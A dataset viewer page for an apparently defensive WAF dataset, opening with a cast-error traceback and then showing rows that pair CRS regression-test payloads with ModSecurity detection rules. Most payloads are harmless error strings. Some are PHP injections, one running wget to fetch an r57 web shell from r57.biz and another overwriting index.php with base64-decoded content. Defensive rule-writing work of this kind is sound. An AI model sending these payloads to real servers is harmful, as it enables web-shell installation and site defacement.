Dataset Preview
Duplicate
The full dataset viewer is not available (click to read why). Only showing a preview of the rows.
The dataset generation failed because of a cast error
Error code:   DatasetGenerationCastError
Exception:    DatasetGenerationCastError
Message:      An error occurred while generating the dataset

All the data files must have the same columns, but at some point there are 1 new columns ({'messages'}) and 3 missing columns ({'input', 'output', 'metadata'}).

This happened while the json dataset builder was generating data using

hf://datasets/llm4waf/defend/crs_rules/openai_training.jsonl (at revision 514b13931fd8a32c359456aa4dd0bde030ca85d8)

Please either edit the data files to have matching columns, or separate them into different configurations (see docs at https://hf.co/docs/hub/datasets-manual-configuration#multiple-configurations)
Traceback:    Traceback (most recent call last):
                File "/usr/local/lib/python3.12/site-packages/datasets/builder.py", line 1831, in _prepare_split_single
                  writer.write_table(table)
                File "/usr/local/lib/python3.12/site-packages/datasets/arrow_writer.py", line 714, in write_table
                  pa_table = table_cast(pa_table, self._schema)
                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                File "/usr/local/lib/python3.12/site-packages/datasets/table.py", line 2272, in table_cast
                  return cast_table_to_schema(table, schema)
                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                File "/usr/local/lib/python3.12/site-packages/datasets/table.py", line 2218, in cast_table_to_schema
                  raise CastError(
              datasets.table.CastError: Couldn't cast
              messages: list<item: struct<role: string, content: string>>
                child 0, item: struct<role: string, content: string>
                    child 0, role: string
                    child 1, content: string
              to
              {'input': {'attack_context': {'location': List(Value('string')), 'method': Value('string')}, 'malicious_payload': List({'location': Value('string'), 'value': Value('string')})}, 'output': {'attack_type': List(Value('string')), 'detection': {'operator': {'argument': Value('string'), 'negated': Value('bool'), 'type': Value('string')}, 'variables': List({'name': Value('string'), 'negated': Value('bool'), 'part': Value('string')})}, 'severity': Value('string'), 'transformations': List(Value('string'))}, 'metadata': {'rule_id': Value('string'), 'test_description': Value('string')}}
              because column names don't match
              
              During handling of the above exception, another exception occurred:
              
              Traceback (most recent call last):
                File "/src/services/worker/src/worker/job_runners/config/parquet_and_info.py", line 1455, in compute_config_parquet_and_info_response
                  parquet_operations = convert_to_parquet(builder)
                                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^
                File "/src/services/worker/src/worker/job_runners/config/parquet_and_info.py", line 1054, in convert_to_parquet
                  builder.download_and_prepare(
                File "/usr/local/lib/python3.12/site-packages/datasets/builder.py", line 894, in download_and_prepare
                  self._download_and_prepare(
                File "/usr/local/lib/python3.12/site-packages/datasets/builder.py", line 970, in _download_and_prepare
                  self._prepare_split(split_generator, **prepare_split_kwargs)
                File "/usr/local/lib/python3.12/site-packages/datasets/builder.py", line 1702, in _prepare_split
                  for job_id, done, content in self._prepare_split_single(
                                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^
                File "/usr/local/lib/python3.12/site-packages/datasets/builder.py", line 1833, in _prepare_split_single
                  raise DatasetGenerationCastError.from_cast_error(
              datasets.exceptions.DatasetGenerationCastError: An error occurred while generating the dataset
              
              All the data files must have the same columns, but at some point there are 1 new columns ({'messages'}) and 3 missing columns ({'input', 'output', 'metadata'}).
              
              This happened while the json dataset builder was generating data using
              
              hf://datasets/llm4waf/defend/crs_rules/openai_training.jsonl (at revision 514b13931fd8a32c359456aa4dd0bde030ca85d8)
              
              Please either edit the data files to have matching columns, or separate them into different configurations (see docs at https://hf.co/docs/hub/datasets-manual-configuration#multiple-configurations)

Need help to make the dataset viewer work? Make sure to review how to configure the dataset viewer, and open a discussion for direct support.

input
dict
output
dict
metadata
dict
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"SyntaxError (/path/to/your/app/controllers/reflects_controller.rb:10: syntax error, unexpected keyword_end)\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "ruby-errors.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "severity": ...
{ "rule_id": "956100", "test_description": "Ruby SyntaxError" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"NameError (undefined local variable or method `unexistent_variable' for #&lt;PostsController:0x00007f...>\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "ruby-errors.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "severity": ...
{ "rule_id": "956100", "test_description": "Ruby NameError" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"ActiveRecord::RecordNotFound (Couldn't find Post with 'id'=999)\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "ruby-errors.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "severity": ...
{ "rule_id": "956100", "test_description": "Ruby ActiveRecord::RecordNotFound" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"ActionView::Template::Error (undefined method 'name' for nil:NilClass)\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "ruby-errors.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "severity": ...
{ "rule_id": "956100", "test_description": "Ruby ActionView::Template::Error" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"TypeError: no implicit conversion of String into Integer\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "ruby-errors.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "severity": ...
{ "rule_id": "956100", "test_description": "Ruby TypeError" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"NoMethodError: undefined method 'author_name' for #<User:0x00007f...>\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "ruby-errors.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "severity": ...
{ "rule_id": "956100", "test_description": "Ruby NoMethodError" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"ArgumentError: wrong number of arguments (given 0, expected 1)\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "ruby-errors.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "severity": ...
{ "rule_id": "956100", "test_description": "Ruby ArgumentError" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"ActionController::RoutingError: No route matches [GET] \"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "ruby-errors.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "severity": ...
{ "rule_id": "956100", "test_description": "Ruby ActionController::RoutingError" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"ActionController::ParameterMissing: param is missing or the value is empty: comment\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "ruby-errors.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "severity": ...
{ "rule_id": "956100", "test_description": "Ruby ActionController::ParameterMissing" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"fileuploaderror\":\"File upload failed.\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "ruby-errors.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "severity": ...
{ "rule_id": "956100", "test_description": "False Positive: Roundcube defining error message for frontend, matching `loaderror` in `fileuploaderror`" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{ \"noJavascriptError\":\"SOGo requires Javascript to run. Please make sure this option is available and activated within your browser preferences.\"...
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "ruby-errors.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "severity": ...
{ "rule_id": "956100", "test_description": "False Positive: SOGo defining error message for frontend, matching `scriptError` in `noJavascriptError`" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"<% end %>\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "(?i)(?:<%[=#\\s]|#\\{[^}]+\\})", "negated": false, "type": "@rx" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "sever...
{ "rule_id": "956110", "test_description": "Ruby ERB Template leakage" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"<p>Name: <%= @user.name %></p>\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "(?i)(?:<%[=#\\s]|#\\{[^}]+\\})", "negated": false, "type": "@rx" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "sever...
{ "rule_id": "956110", "test_description": "Ruby ERB Template leakage" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "{\"body\": \"p Name: #{user.name}\"}" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "(?i)(?:<%[=#\\s]|#\\{[^}]+\\})", "negated": false, "type": "@rx" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "sever...
{ "rule_id": "956110", "test_description": "Ruby Slim Interpolation" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "<%- sidebar.id %>" } ] }
{ "attack_type": [ "attack-disclosure" ], "detection": { "operator": { "argument": "(?i)(?:<%[=#\\s]|#\\{[^}]+\\})", "negated": false, "type": "@rx" }, "variables": [ { "name": "RESPONSE_BODY", "negated": false, "part": "" } ] }, "sever...
{ "rule_id": "956110", "test_description": "False Positive: Don't match templates for WordPress site customizer" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=<?exec('wget%20http://r57.biz/r57.txt%20-O" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES",...
{ "rule_id": "933100", "test_description": "PHP Injection Attack (933100) from old modsec regressions" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by...
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES",...
{ "rule_id": "933100", "test_description": "PHP Injection Attack (933100) from old modsec regressions" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=somePhpWouldGoHere%5B%2Fphp%5D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES",...
{ "rule_id": "933100", "test_description": "PHP injection attack: looking for [/php] closing tag" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=somePhpWouldGoHere%5B%5Cphp%5D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES",...
{ "rule_id": "933100", "test_description": "PHP injection attack: looking for [\\php] closing tag" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%3C%3Fxml%20%3Aecho%201%3B" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES",...
{ "rule_id": "933100", "test_description": "xml/php polyglot payload, using a PHP\ndecoded payload: <?xml :echo 1;'\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%3C%3Fxml%20%3Aecho%201%3B" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES",...
{ "rule_id": "933100", "test_description": "xml/php polyglot payload, using a PHP, uppercase test\ndecoded payload: <?XML :echo 1;'\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%3C%3Fxml%20%3AfputCSV%28%24alreadyOpenFile%2C%20array%28%22foo%22%2C%20%22bar%22%2C%20%22hello%22%2C%20%22world%22%29%29%3B" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES",...
{ "rule_id": "933100", "test_description": "xml/php polyglot payload, using a PHP\ndecoded payload: <?xml :fputCSV($alreadyOpenFile, array(\"foo\", \"bar\", \"hello\", \"world\"));'\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%3C%3Fxml%20%20%20%09%09%09%09%09%09%20%28%29%3Becho%201%3B" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES",...
{ "rule_id": "933100", "test_description": "xml/php polyglot payload, using a PHP\ndecoded payload: <?xml \t\t\t\t\t\t ();echo 1;\n" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "----------397236876\nContent-Disposition: form-data; name=\"fileRap\"; filename=\"something/dangerous.php\"\nContent-Type: text/plain\n\nplease block...
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": ".*\\.ph(?:p\\d*|tml|ar|ps|t|pt)\\.*$", "negated": false, "type": "@rx" }, "variables": [ { "name": "FILES", "negated": false, "part": "" }, { "...
{ "rule_id": "933110", "test_description": "PHP upload via multipart" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "----------397236876\nContent-Disposition: form-data; name=\"something/dangerous.php\"; filename=\"safe.txt\"\nContent-Type: text/plain\n\nplease don'...
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": ".*\\.ph(?:p\\d*|tml|ar|ps|t|pt)\\.*$", "negated": false, "type": "@rx" }, "variables": [ { "name": "FILES", "negated": false, "part": "" }, { "...
{ "rule_id": "933110", "test_description": "PHP upload via multipart should pass" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "----------397236876\nContent-Disposition: form-data; name=\"file\"; filename=\"safe.phpinfo\"\nContent-Type: text/plain\n\nplease don't block me\n---...
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": ".*\\.ph(?:p\\d*|tml|ar|ps|t|pt)\\.*$", "negated": false, "type": "@rx" }, "variables": [ { "name": "FILES", "negated": false, "part": "" }, { "...
{ "rule_id": "933110", "test_description": "PHP upload via multipart should pass" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "var=opcache.jit_max_polymorphic_calls%3d50" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "PHP Injection Attack: Configuration Directive" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "var=session.referer_check%3dtrue" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "Test correct logging" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "var=engine%3dtrue" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "PHP Injection Attack: Configuration Directive: engine" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "var=extension%3dtrue" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "PHP Injection Attack: Configuration Directive: extension" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "var=mbstring.regex_retry_limit%3dtrue" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "PHP Injection Attack: Configuration Directive: mbstring.regex_retry_limit" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "var=mbstring.regex_stack_limit%3dtrue" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "PHP Injection Attack: Configuration Directive: mbstring.regex_stack_limit" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "var=precision%3dtrue" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "PHP Injection Attack: Configuration Directive: precision" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "var=smtp%3dtrue" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "PHP Injection Attack: Configuration Directive: smtp" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "var=unserialize_max_depth%3dtrue" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "PHP Injection Attack: Configuration Directive: unserialize_max_depth" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "SAMLRequest=mhXNy9pMlFhTjBlRkkzSkpia1Y2cSMtPEE9PTwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjwvc2FtbDpBdHRyaWJ1dGVTdGF0ZW1lbnQ+PC9zYW1sOkFzc...
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "FP PHP Injection Attack: prevent matching base64 encoded requests" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "code=memory_limit%20=%20512M" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "PHP Injection Attack: Block config directive with whitespace" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "code=extension_dir=/path/to/example" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(...
{ "rule_id": "933120", "test_description": "PHP Injection Attack: Block config directive with a path" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "x=$_SERVER['test'];" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-variables.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { "...
{ "rule_id": "933130", "test_description": "Trigger a basic request" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "x=$_SE%20RVER['test'];" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-variables.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { "...
{ "rule_id": "933130", "test_description": "Non-Server Request" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "x=$_%53ERVER['test'];" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-variables.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { "...
{ "rule_id": "933130", "test_description": "SERVER request URLEncoded" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "%24_COOKIE=value;" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-variables.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { "...
{ "rule_id": "933130", "test_description": "SERVER request URLEncoded" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "x=$_%53%20ERVER['request_uri'];" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-variables.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { "...
{ "rule_id": "933130", "test_description": "SERVER index listed with obfuscated SERVER" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%24%7B%27ff%27%7D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { ...
{ "rule_id": "933135", "test_description": "${'ff'}" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%24%20%7B%27fdf%27%7D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { ...
{ "rule_id": "933135", "test_description": "$ {'fdf'}" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%24%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7B%24a%7D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { ...
{ "rule_id": "933135", "test_description": "$ {$a}" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%24%20%7B%27_VAR%27.%27IABLE_NAME%27%7D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { ...
{ "rule_id": "933135", "test_description": "$ {'_VAR'.'IABLE_NAME'}" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%24%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7B%20%20%20%20%20%20%20%20%20%24a%7D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { ...
{ "rule_id": "933135", "test_description": "$ { $a}" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%24%20%20%20%20%20%7B%20%20%20CONSTANT%20%20%20%7D" } ] }
